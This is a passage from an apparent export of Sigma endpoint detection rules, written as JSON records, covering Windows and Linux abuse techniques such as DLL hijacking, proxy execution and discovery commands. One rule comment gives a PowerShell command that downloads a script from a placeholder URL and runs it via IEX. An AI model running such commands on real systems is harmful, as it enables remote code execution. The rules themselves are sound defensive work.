"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072811Z",
"creation_date": "2026-03-23T11:45:34.072813Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072817Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en",
"https://github.com/mandiant/ccmpwn",
"https://attack.mitre.org/techniques/T1072/"
],
"name": "t1072_scnotification_process_exec.yml",
"content": "title: Windows Session Hijacking via SCNotification.exe\nid: 7ee4cf79-a255-401f-9014-daf70499ceee\ndescription: |\n Detects the execution of an uncommon process by SCNotification.exe.\n Adversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\n It is recommended to check the content of the SCNotification.exe.config file in the same folder that the SCNotification.exe executable to identify any malicious content and check actions made by the child process.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/windows-session-hijacking-via-ccmexec?hl=en\n - https://github.com/mandiant/ccmpwn\n - https://attack.mitre.org/techniques/T1072/\ndate: 2024/07/31\nmodified: 2025/06/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.lateral_movement\n - attack.t1072\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\SCNotification.exe'\n # If we cannot read info about the file, we can't verify the signature\n ProcessSha256|contains: '?'\n\n filter_legitimate:\n - Image:\n - '?:\\Windows\\System32\\werfault.exe'\n - '?:\\WINDOWS\\SysWOW64\\WerFault.exe'\n - Image|endswith:\n - '\\SCNotification.exe'\n - '\\SCClient.exe'\n - '\\SCToastNotification.exe'\n Signed: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_edge:\n CommandLine|contains: '\\Microsoft\\Edge\\Application\\msedge.exe --single-argument http://go.microsoft.com/fwlink/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ee4cf79-a255-401f-9014-daf70499ceee",
"rule_name": "Windows Session Hijacking via SCNotification.exe",
"rule_description": "Detects the execution of an uncommon child process by SCNotification.exe.\nAdversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\nKnown legitimate children such as WerFault.exe and the SCClient/SCToastNotification executables, as well as the Microsoft Edge launch of a go.microsoft.com fwlink URL, are excluded.\nIt is recommended to check the content of the SCNotification.exe.config file in the same folder as the SCNotification.exe executable to identify any malicious content, and to review the actions performed by the child process.\n",
"rule_creation_date": "2024-07-31",
"rule_modified_date": "2025-06-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1072"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ef0ab65-9717-4532-ac6a-77b151ac6a3d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613240Z",
"creation_date": "2026-03-23T11:45:34.613243Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613250Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/netstat.8.html",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_netstat_linux.yml",
"content": "title: Network Statistics Discovered via Netstat (Linux)\nid: 7ef0ab65-9717-4532-ac6a-77b151ac6a3d\ndescription: |\n Detects the execution of the netstat command to display the contents of various network-related data structures.\n Attackers may use it during discovery phase to retrieve network connection statistics and gather active connections' IP and port.\n It is recommended to look for other network discovery activities, and create a baseline of legitimate administrative netstat usage to identify potential reconnaissance activity.\nreferences:\n - https://man7.org/linux/man-pages/man8/netstat.8.html\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2022/12/23\nmodified: 2025/10/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0104\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image: 'THIS_RULE_IS_DISABLED'\n\n condition: selection\n\n # selection:\n # Image|endswith: '/netstat'\n # ParentImage|startswith: '/' # Filter-out missing parents\n # GrandparentImage|startswith: '/' # Filter-out missing grandparents\n\n # exclusion_periodic_status_network:\n # ParentCommandLine: '/bin/sh /etc/periodic/daily/420.status-network'\n # CommandLine: 'netstat -i'\n\n # exclusion_munin:\n # - ParentCommandLine:\n # - '/bin/sh /etc/munin/plugins/*'\n # - '/usr/bin/sh /etc/munin/plugins/*'\n # - '/usr/bin/perl -wT /usr/sbin/munin-node'\n # - GrandparentCommandLine:\n # - '/usr/sbin/munin-node [127.0.0.1]'\n # - '/usr/sbin/munin-node [::ffff:127.0.0.1]'\n # - '/usr/bin/perl -wT /usr/sbin/munin-node'\n\n # exclusion_nmon:\n # GrandparentImage: '/usr/bin/nmon'\n\n # exclusion_rapid7:\n # ParentCommandLine|startswith:\n # - \"/bin/bash -c echo 'Rapid7Echo'; (LANG=C;LANGUAGE=\"\n # - 'bash -c LANG=C;LANGUAGE=en;netstat -plunt'\n\n # exclusion_insights_client:\n # 
ParentImage: '/usr/bin/timeout'\n # GrandparentCommandLine|contains:\n # - '/site-packages/insights_client/run.py'\n # - '/bin/insights-client-run'\n # - '/bin/redhat-access-insights'\n\n # exclusion_insights_client_2:\n # ParentCommandLine|startswith:\n # - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n # - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n\n # exclusion_sap:\n # - ParentImage:\n # - '/usr/sap/hostctrl/exe/sapacosprep'\n # - '/usr/sap/hostctrl/exe/sapacext'\n # - GrandparentImage:\n # - '/usr/sap/hostctrl/exe/saposcol'\n\n # exclusion_glpi_agent:\n # # /usr/bin/perl\n # # /tmp/.mount_glpi-aYA0UzH/usr/bin/perl\n # ParentImage: '*/usr/bin/perl'\n # ParentCommandLine|startswith: 'glpi-agent'\n\n # exclusion_glpi_agent_2:\n # GrandparentCommandLine|contains:\n # - 'glpi-agent ('\n # - 'glpi-agent:'\n # - '/usr/bin/glpi-agent'\n\n # # https://github.com/ansible/awx\n # exclusion_ansibleawx:\n # User: 'ansibleawx'\n # GrandparentCommandLine: 'sshd: ansibleawx@notty'\n\n # exclusion_qualys1:\n # GrandparentImage:\n # - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n # - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n # exclusion_qualys2:\n # CommandLine:\n # - 'netstat -nlp'\n # - 'netstat -pln'\n # - 'netstat -lnp'\n # - 'netstat -lntp'\n # - 'netstat -anup'\n # ParentImage: '/usr/bin/timeout'\n # GrandparentImage: '/usr/bin/bash'\n # exclusion_qualys3:\n # CommandLine:\n # - 'netstat -i'\n # - 'netstat -an'\n # - 'netstat -tn'\n # - 'netstat -anu'\n # - 'netstat -atnp'\n # - 'netstat -tulnp'\n # - 'netstat -tupln'\n # ParentImage: '/usr/bin/timeout'\n # GrandparentImage: '/usr/bin/bash'\n\n # exclusion_udscan:\n # - ParentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n # - GrandparentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n\n # exclusion_fusioninventory:\n # - ParentCommandLine|startswith: 'fusioninventory-agent'\n # - 
GrandparentCommandLine|startswith:\n # - 'fusioninventory-agent'\n # - '/usr/bin/perl /usr/bin/fusioninventory-agent'\n\n # exclusion_cpsureproxy:\n # ParentCommandLine: '/bin/bash /etc/rc.d/init.d/cpsureproxy-web start'\n\n # exclusion_oracle:\n # - ParentImage:\n # - '/u01/app/oracle/product/agent*/agent_*/perl/bin/perl'\n # - '/u01/app/oracle/product/agent*/agent_*/oracle_common/jdk/bin/java'\n # - '/opt/app/oracle/agent*/agent_*/perl/bin/perl'\n # - '/opt/app/oracle/agent*/agent*/oracle_common/jdk/bin/java'\n # - '/u01/app/oracle/agent/agent_*/oracle_common/jdk/bin/java'\n # - '/u01/app/oracle/agent/agent_*/perl/bin/perl'\n # - GrandparentImage:\n # - '/u01/app/*/perl/bin/perl'\n # - '/u01/app/*/jdk/bin/java'\n # - '/opt/app/*/perl/bin/perl'\n # - '/opt/app/*/jdk/bin/java'\n # - '/tmp/CVU_*_resource/exectask'\n # - ParentCommandLine:\n # - '*> /tmp/CVU_*_resource/scratch/exout*.out 2>/dev/null'\n\n # exclusion_zabbix:\n # - GrandparentImage: '/usr/sbin/zabbix_agent2'\n # - GrandparentImage|endswith: '/zabbix/sbin/zabbix_agentd'\n # - GrandparentCommandLine:\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_udp_services.pl'\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_tcp_services.pl'\n\n # exclusion_runc:\n # GrandparentImage: '/usr/bin/runc'\n\n # exclusion_tug:\n # GrandparentCommandLine|contains:\n # - '/usr/lib/tug/env/bin/python /usr/sbin/tug_sysmetrics.py'\n # - '/usr/bin/python3 /usr/sbin/mbg-cronlock /var/run/tug-system-metrics.lock /usr/sbin/tug_sysmetrics.py'\n # - '/bin/sh -c /usr/sbin/mbg-cronlock /var/run/tug-system-metrics.lock /usr/sbin/tug_sysmetrics.py'\n\n # exclusion_zabbix:\n # - GrandparentImage: '/usr/sbin/zabbix_agent2'\n # - GrandparentCommandLine:\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_udp_services.pl'\n # - '/usr/bin/perl /etc/zabbix/zabbix_agentd.d/discovery_tcp_services.pl'\n\n # exclusion_dynamosoft:\n # GrandparentImage: '/opt/dynamsoft/DynamsoftService/DynamsoftService'\n\n # 
exclusion_netbackup:\n # GrandparentImage: '/usr/openv/netbackup/bin/private/nbsu'\n\n # exclusion_xc7controlm:\n # GrandparentCommandLine|contains:\n # - '/product/xc7controlm/ag/ctmagrec/ctm/scripts/shut-ag'\n # - '/product/xc7controlm/ag/ctmagrec/ctm/scripts/start-ag'\n # - '/product/xc7controlm/ag/ctmagrec/ctm/scripts/shagent'\n\n # exclusion_moba:\n # ParentCommandLine|contains|all:\n # - 'sh -c while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n ?? /proc/net/dev;echo ?==> /proc/df <==?;'\n # - 'echo ?==> /proc/who <==?;who;echo ?==> /proc/end <==?;echo ?##Moba##?; done'\n # GrandparentImage: '/usr/sbin/sshd'\n\n # exclusion_lynis:\n # ParentCommandLine:\n # - '/bin/sh ./lynis audit system'\n # - '/bin/sh /usr/bin/lynis audit system --cronjob'\n # - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n # exclusion_chkrootkit:\n # - ParentCommandLine:\n # - '/bin/sh /usr/sbin/chkrootkit'\n # - '/bin/bash /etc/cron.daily/chkrootkit.sh'\n # - '/bin/sh /etc/cron.daily/chkrootkit'\n # - GrandparentCommandLine:\n # - '/bin/bash /etc/cron.daily/chkrootkit.sh'\n # - '/bin/bash /bin/run-parts /etc/cron.daily'\n\n # exclusion_wazuh:\n # GrandparentImage:\n # - '/var/ossec/bin/wazuh-syscheckd'\n # - '/var/ossec/bin/wazuh-logcollector'\n\n # exclusion_pandora:\n # - ParentCommandLine: '/bin/bash /etc/pandora/plugins/pandora_netusage'\n # - GrandparentCommandLine: '/usr/bin/perl /usr/bin/pandora_agent /etc/pandora'\n\n # exclusion_illumio_ven:\n # ParentImage: '/opt/illumio_ven/bin/venAgentMgr'\n\n # exclusion_nagios:\n # ProcessParentCommandLine|contains: '/nagios/plugins/check_netstat '\n\n # exclusion_isa:\n # ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n # exclusion_observium:\n # ParentCommandLine: '/bin/bash /usr/bin/observium_agent'\n\n # exclusion_amp_watchdog:\n # GrandparentImage: '/opt/quest/kace/bin/AMPWatchDog'\n\n # 
exclusion_prodige_jbossadmin:\n # ParentCommandLine|startswith: '/bin/bash /prodige/server/production/ord1/jbossadmin/jbossadmin '\n\n # exclusion_iptables:\n # ParentCommandLine|startswith: '/bin/bash /etc/network/iptables/'\n\n # exclusion_wicd:\n # ParentCommandLine|startswith: '/usr/bin/python -o /usr/share/wicd/daemon/wicd-daemon.py'\n\n # exclusion_cfengine:\n # - ParentImage|startswith: '/var/cfengine/'\n # - ParentCommandLine|contains: '/var/cfengine/'\n\n # exclusion_sosreport:\n # - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n # - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n # exclusion_centreon:\n # - ParentCommandLine|startswith: '/usr/bin/perl /usr/lib/centreon/plugins/centreon_linux_local.pl'\n # - GrandparentCommandLine|startswith:\n # - '/usr/sbin/nrpe -c /etc/nrpe/centreon-nrpe3.cfg -f'\n # - '/usr/sbin/centreon-nrpe3 -c /etc/nrpe/centreon-nrpe3.cfg -d'\n\n # exclusion_sas:\n # ParentCommandLine|startswith: '/opt/sas/sashome/sasprivatejavaruntimeenvironment/*/jre/bin/java'\n\n # condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ef0ab65-9717-4532-ac6a-77b151ac6a3d",
"rule_name": "Network Statistics Discovered via Netstat (Linux)",
"rule_description": "Detects the execution of the netstat command to display the contents of various network-related data structures.\nAttackers may use it during the discovery phase to retrieve network connection statistics and gather the IP addresses and ports of active connections.\nNote: this rule is currently disabled. Its selection matches the placeholder image name THIS_RULE_IS_DISABLED and the original netstat selection and exclusions are kept commented out in the rule content, so it produces no alerts until that logic is restored.\nIt is recommended to look for other network discovery activities, and to create a baseline of legitimate administrative netstat usage to identify potential reconnaissance activity.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-10-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ef5765c-b012-4951-9fc8-5dfa739c8d6c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075243Z",
"creation_date": "2026-03-23T11:45:34.075245Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075249Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://twitter.com/monoxgas/status/895045566090010624",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_syncappvpublishingserver.yml",
"content": "title: Suspicious Proxy Execution via SyncAppvPublishingServer.exe\nid: 7ef5765c-b012-4951-9fc8-5dfa739c8d6c\ndescription: |\n Detects the use of SyncAppvPublishingServer which is used by Microsoft Application Virtualization (App-V).\n This binary may be abused by attackers to bypass security restrictions and execute PowerShell code.\n It is recommended to check the behavior of the process and search for PowerShell execution to determine whether this action is legitimate. This behavior is highly suspicious if App-V is not deployed on the machine.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\n - https://twitter.com/monoxgas/status/895045566090010624\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.SyncAppvPublishingServer\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\SyncAppvPublishingServer.exe'\n - OriginalFileName: 'syncappvpublishingserver.exe'\n selection_command:\n # SyncAppvPublishingServer.exe n; Start-Process calc.exe\n # SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX\"\n CommandLine|contains: 'n;'\n condition: all of selection_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ef5765c-b012-4951-9fc8-5dfa739c8d6c",
"rule_name": "Suspicious Proxy Execution via SyncAppvPublishingServer.exe",
"rule_description": "Detects the execution of SyncAppvPublishingServer.exe, a Microsoft Application Virtualization (App-V) binary, with a command line containing the n; prefix used to pass PowerShell code to it.\nThis binary may be abused by attackers to bypass security restrictions and execute PowerShell code.\nIt is recommended to check the behavior of the process and search for PowerShell execution to determine whether this action is legitimate. This behavior is highly suspicious if App-V is not deployed on the machine.\n",
"rule_creation_date": "2022-03-01",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f36c250-2b15-4c30-b99b-c77071db7a53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599302Z",
"creation_date": "2026-03-23T11:45:34.599306Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599314Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ngciso.yml",
"content": "title: DLL Hijacking via ngciso.exe\nid: 7f36c250-2b15-4c30-b99b-c77071db7a53\ndescription: |\n Detects potential Windows DLL Hijacking via ngciso.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ngciso.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iumbase.DLL'\n - '\\iumsdk.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f36c250-2b15-4c30-b99b-c77071db7a53",
"rule_name": "DLL Hijacking via ngciso.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ngciso.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule fires when a Microsoft-signed ngciso.exe loads iumbase.DLL or iumsdk.dll; loads where the process or the DLL resides under System32, SysWOW64 or WinSxS, or where the loaded DLL carries a valid Microsoft Windows signature, are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f39ba1d-5f3b-4c6d-b442-1b862570323f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087220Z",
"creation_date": "2026-03-23T11:45:34.087223Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087227Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1581191005537468417",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_hvc.yml",
"content": "title: Proxy Execution via Hvc.exe\nid: 7f39ba1d-5f3b-4c6d-b442-1b862570323f\ndescription: |\n Detects a suspicious execution of Hvc.exe as a proxy to launch another application.\n Attackers can set a command to be executed by Hvc in the HV_SSH_COMMAND environment variable.\n This technique can be used to bypass defensive measures.\n It is recommended to analyze the process responsible for the execution of Hvc.exe as well as to look for malicious actions performed by child processes.\nreferences:\n - https://twitter.com/0gtweet/status/1581191005537468417\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/10/27\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_grandparent:\n GrandparentCommandLine|contains|all:\n - 'ssh'\n - 'dummyparam'\n\n selection_parent:\n ParentCommandLine|endswith: '\\cmd.exe /c * -o ProxyCommand=* nc -t vsock,ip --ssh --host-prefix hyper-v/ \"%h\" %p -o HostName=hyper-v/%h dummyparam'\n\n exclusion_sitekiosk:\n ParentCommandLine|startswith: '?:\\Program Files (x86)\\SiteKiosk\\SiteKiosk.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f39ba1d-5f3b-4c6d-b442-1b862570323f",
"rule_name": "Proxy Execution via Hvc.exe",
"rule_description": "Detects a suspicious execution of Hvc.exe as a proxy to launch another application.\nAttackers can set a command to be executed by Hvc in the HV_SSH_COMMAND environment variable.\nThis technique can be used to bypass defensive measures.\nIt is recommended to analyze the process responsible for the execution of Hvc.exe as well as to look for malicious actions performed by child processes.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f521bea-fbfa-4c6c-8d8b-391265ec0d9c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622488Z",
"creation_date": "2026-03-23T11:45:34.622490Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622495Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1082/",
"https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/",
"https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong",
"https://www.cisa.gov/news-events/analysis-reports/ar20-198a",
"https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
"https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia"
],
"name": "t1082_systeminfo.yml",
"content": "title: Systeminfo Execution\nid: 7f521bea-fbfa-4c6c-8d8b-391265ec0d9c\ndescription: |\n Detects the execution of systeminfo.exe.\n Systeminfo.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a computer.\n It is recommended to analyze the process responsible for the execution of route.exe to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1082/\n - https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/\n - https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong\n - https://www.cisa.gov/news-events/analysis-reports/ar20-198a\n - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\n - https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia\ndate: 2021/04/01\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.s0096\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\systeminfo.exe'\n # Renamed binaries\n - OriginalFileName: 'sysinfo.exe'\n\n exclusion_parent:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage: '?:\\Windows\\System32\\userinit.exe'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - 